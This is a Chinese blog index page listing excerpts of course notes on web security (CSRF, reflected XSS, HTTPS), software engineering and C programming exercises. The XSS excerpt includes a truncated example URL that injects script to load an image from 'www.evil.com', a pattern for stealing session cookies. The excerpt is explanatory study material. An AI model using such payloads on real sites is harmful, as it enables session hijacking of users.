- 博客(8)
- 收藏
- 关注
RSS订阅原创 2017中科大信息安全课程总结四
CSRF攻击1.攻击原理1.用户登录信任网站A2.验证通过,并在用户浏览器处产生A的Cookie3.用户在没有登录A网站的情形下,访问了黑客网站B4.B网站要求访问第三方站点A,发送一个请求5.根据B在第4步的请求,浏览器带着第2步产生的Cookie访问A6.这步在实际中并没有发生。但其等效于B向A发送请求。由于A并不知情请求的来源,它根据请求中带有的用户的Cookie,处理第5步的请求
2017-07-15 10:52:12
1328
原创 2017中科大信息安全课程总结三
反射型XSS攻击的原理攻击步骤1.用户正常登陆web应用程序,登陆成功后会得到一个会话信息的cookie Set-Cookie: sessId=xxxxxx2.攻击者将含有攻击代码的URL发送给受害者http://www.example.com?send=<script>document.write(<img height=0 width=0 src="http://www.evil.com
2017-07-10 21:31:18
860
原创 2017中科大信息安全课程总结二
HTML&CSS1.HTMLHTML 表单用于收集不同类型的用户输入。表单是一个包含表单元素的区域,表单元素时允许用户在表单中(比如:文本域、下拉列表、单选框、复选框等等)输入信息的元素。表单使用表单标签<form>定义。HTML负责网页的具体内容(结构),而CSS则修饰网页的表现形式(布局)。2.CSS2.1 CSS基本模型selector {property : value;}selector
2017-07-02 11:26:47
774
原创 2017中科大信息安全课程总结一
https部分1.https原理1.客户端(浏览器)的“证书管理器”里有“受信任的根证书颁发机构”,即对应的CA和服务器站点的证书。2.客户端向服务器端发送加密请求(如https://www.baidu.com)。3.服务器收到请求后,需要向客户端验证自己的身份。于是将自己的公钥发送给CA,CA用自己的私钥对服务器的公钥加密,生成数字签名。CA再将服务器的公钥、数字签名和服务器的一些其它消息整
2017-07-01 22:41:02
2342
原创 2017春高级软件工程学习总结
一、课程总结《高级软件工程》是本学期我的专业必选课, 很幸运能够在孟宁老师地指导下学习这门课。在此之前,我对软件工程这个概念的理解只是浮于表面,可以说是并不具备基本的软件工程的思想。在本科的所做的毕业设计中,主要做的工作是如何实现代码的编写,很少从软件工程的角度去看待实现的项目。但是随着学习的深入,发现在实际项目过程中,缺少软件工程的知识和思想会对实际项目开发产生很大影响,于是我决定认真地学习《高级
2017-06-16 15:01:06
564
1
翻译 WebGoat 开发者版安装教程
WebGoat: A deliberately insecure Web Application Important InformationThe WebGoat Lesson Server, is currently UNDER MAJOR DEVELOMENT.As of February 1st 2016, the version “7.0.1” is considered th
2017-06-10 19:13:53
1447
1
原创 Linux_C编程一站式学习(Chapter6的ex2)
题目编写函数diamond打印一个菱形。如果调用diamond(3, ‘*’),则打印: 如果调用diamond(5, ‘+’),则打印: 思路阐述1.首先要明白一点,这个程序设计的精髓在于如何控制printf来实现菱形的打印。2.观察给的两个范例,可以发现这样的规律:如果把每两个字符之间的距离假定为一个制表符’\t’的距离,那么对应每行输出的字符数(如’+’)和空格数的数目总和即为
2017-05-14 22:32:19
356
原创 库力索法半导体C++岗 笔试题
库力索法半导体C++岗笔试题1.题目#include<stdio.h>char * GetMemory(void){ char p[] = "hello world"; return p;}int main(){ char * str; str = GetMemory(); printf("%s",str); return 0;}Questio
2017-05-08 17:08:10
1321
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人